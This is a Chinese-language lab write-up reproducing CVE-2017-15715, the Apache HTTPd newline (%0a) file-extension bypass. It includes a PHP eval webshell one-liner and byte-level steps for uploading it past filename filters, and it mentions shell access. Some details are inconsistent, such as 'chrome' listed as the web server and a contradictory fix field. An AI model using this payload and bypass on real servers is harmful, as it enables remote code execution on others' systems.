apache-httpd_换行解析漏洞_CVE-2017-15715
说明 | 内容 |
---|---|
漏洞编号 | CVE-2017-15715 |
漏洞名称 | apache-httpd 换行解析漏洞 |
漏洞评级 | 高危 |
影响范围 | Apache HTTPd 2.4.0~2.4.29 |
漏洞描述 | apache 在修复第一个后缀名解析漏洞时,绕过一些服务器的安全策略 |
修复方案 | 升级 |
漏洞描述
Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。
漏洞等级
高危
影响版本
- Apache HTTPd 2.4.0~2.4.29
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | kali-linux |
Web Server | chrome |
apache httpd | 2.4.0 |
漏洞扫描
使用nuclei工具可以扫描到
./nuclei -u 192.168.117.163
漏洞验证
-
启动环境,访问网站
-
上传文件,内容为一句话木马+phpinfo,格式为.php,进行抓包
<?php @eval($_REQUEST[777]);phpinfo(); ?>
-
在文件名1_info.php后加一个.,为了之后好找
1_info.php.
-
查看16进制编码,找到刚刚添加的.,编码为2e
-
将2e修改为0a,进行发包
-
访问刚刚上传的1_info.php%0a
http://192.168.117.163/1_info.php%0a
深度利用
命令执行
可以通过修改php文件内容进行命令执行
GetShell
可以通过上传木马getshell
漏洞挖掘
网络测绘
apache httpd
修复建议
无